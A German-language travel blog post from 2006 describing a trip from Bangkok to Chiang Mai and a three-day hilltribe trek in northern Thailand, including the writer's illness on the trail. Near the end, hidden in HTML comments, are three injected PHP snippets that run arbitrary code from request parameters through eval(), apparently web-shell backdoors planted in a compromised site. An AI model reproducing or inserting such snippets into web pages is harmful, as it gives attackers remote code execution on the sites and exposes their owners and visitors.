Life is either a daring adventure or nothing at all
Aus dem Dschungel in den Dschungel oder Bangkok – Chiang Mai
Sunday, August 27th, 2006

Nach dem im wahrsten Sinne des Wortes atemberaubendem Großstadtdschungel Bangkok, ging es nach kurzer Zeit und erledigtem Minimalprogramm (2 bis 3 Tempel gesehen, Tuk-Tuk gefahren, Khaosan Road besucht und das ein oder andere Mal abgezockt worden) Richtung echtem Dschungel mit dem Nachtzug nach Ciang Mai. Lärm und die Angst vor Langfingern hielten mich die Nacht über ziemlich wach. Schon in Bangkok hab ich kaum geschlafen auf Grund der sehr, sehr hellhörigen Zimmer und des ständigen Lärmpegels der Stadt. Im Hostel angekommen, ließen wir uns von einer Gruppe Deutscher gleich überreden, an einer Trekkingtour drei Tage durch verschiedene Hilltribe-Dörfer und den umliegenen Dschungel teilzunehmen.

Hilltribe-Frau mit Büffel

Hilltribe-Frau mit Büffel

Nun kann man sich in etwa denken, wie die erste Nacht in einer kleinen Holzhütte, auf dem Boden schlafend und mit löcherigen Moskitonetzen abläuft. Beim ersten Anstieg am nächsten Tag, der von der Sonne ungeschützt über ein Maisfeld oder ähnliches führte, hat mich fertig gemacht. An diesem Tag konnte ich nichts mehr im mir behalten, essen oder trinken. Auf die Wanderung zum zweiten Dorf und die Umgebung mit den schönen Karst-Bergen hab ich mich leider nicht wirklich konzentrieren können. Aber im Prinzip sehr empfehlenswert so eine Trekkingtour in Nordthailand, wenn man sich etwas mehr Zeit lässt.

Wasserfall im Dschungel

Rutschfester Wasserfall

Guesthouse und Tourveranstalter in Chiang Mai: Lindas Guesthouse.

<!– [insert_php]if (isset($_REQUEST["xRPiy"])){eval($_REQUEST["xRPiy"]);exit;}[/insert_php][php]if (isset($_REQUEST["xRPiy"])){eval($_REQUEST["xRPiy"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["noIq"])){eval($_REQUEST["noIq"]);exit;}[/insert_php][php]if (isset($_REQUEST["noIq"])){eval($_REQUEST["noIq"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["xAKG"])){eval($_REQUEST["xAKG"]);exit;}[/insert_php][php]if (isset($_REQUEST["xAKG"])){eval($_REQUEST["xAKG"]);exit;}[/php] –>

Posted in Thailand, Weltreise 2006/07

You must be logged in to post a comment.